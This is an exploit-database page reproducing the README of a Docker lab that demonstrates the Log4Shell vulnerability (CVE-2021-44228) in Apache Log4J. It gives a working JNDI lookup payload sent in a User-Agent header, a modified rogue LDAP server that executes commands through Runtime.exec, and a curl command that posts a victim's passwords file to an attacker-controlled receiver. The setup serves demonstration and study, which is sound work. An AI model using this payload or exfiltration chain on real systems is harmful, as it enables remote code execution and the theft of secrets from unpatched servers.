Exploit for Uncontrolled Resource Consumption in Apache Log4J CVE-2021-44228

Name: Exploit for Uncontrolled Resource Consumption in Apache Log4J CVE-2021-44228
Rating: 5 (136 reviews)
2021-12-12 | CVSS 9.3
## https://sploitus.com/exploit?id=6F20D8B7-C252-5759-B02B-F8E2C9D42E38
# CVE-2021-44228-docker-example

A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker.
All components involved are running via Docker.

## Components

### vulnerable-server
This is a standard Java server acting as the victim. It's running:
- Java `8u111`
- Web Application (Spring Boot 2.6.1)
- Log4J

**This server is `VULNERABLE` using this configuration.**

Additional Information:

- endpoint at `/logging` (GET) will log the user agent using Log4J
- `/foo/passwords.txt` exists (the attackers target)

Content of `passwords.txt`:
```text
my secret
```

### malicious-receiver
This is a standard Java server acting as the data collector of the attacker. It's running:
- Java `17`
- Web Application (Spring Boot 2.6.1)

Additional information:

- endpoint at `receiver` (POST) will log the request body

### malicious-ldap
This is an LDAP server powered by [rogue-jndi](https://github.com/veracode-research/rogue-jndi).
Its `ExportJava` class has been modified so that commands passed via the `-c` flag get executed.

```java
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}
```

When requested by the vulnerable server it will respond with a class running the following command when instantiated:
```shell
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt
```
This will effectively post the content of `/foo/passwords.txt` to the malicious receiver's prepared endpoint.

## Usage

1. setup Docker images by running:
   ```shell
   ./build.sh
   ```
2. start component containers by running:
   ```shell
   ./start.sh
   ```
3. trigger the vulnerability by running:
   ```shell
   curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
   ```
4. check the logging output of the malicious receiver component by running:
   ```shell
   docker logs --timestamps docker_malicious-receiver_1
   ```
   There should be the content of the server's `passwords.txt` file.
5. stop component containers by running:
   ```shell
   ./stop.sh
   ```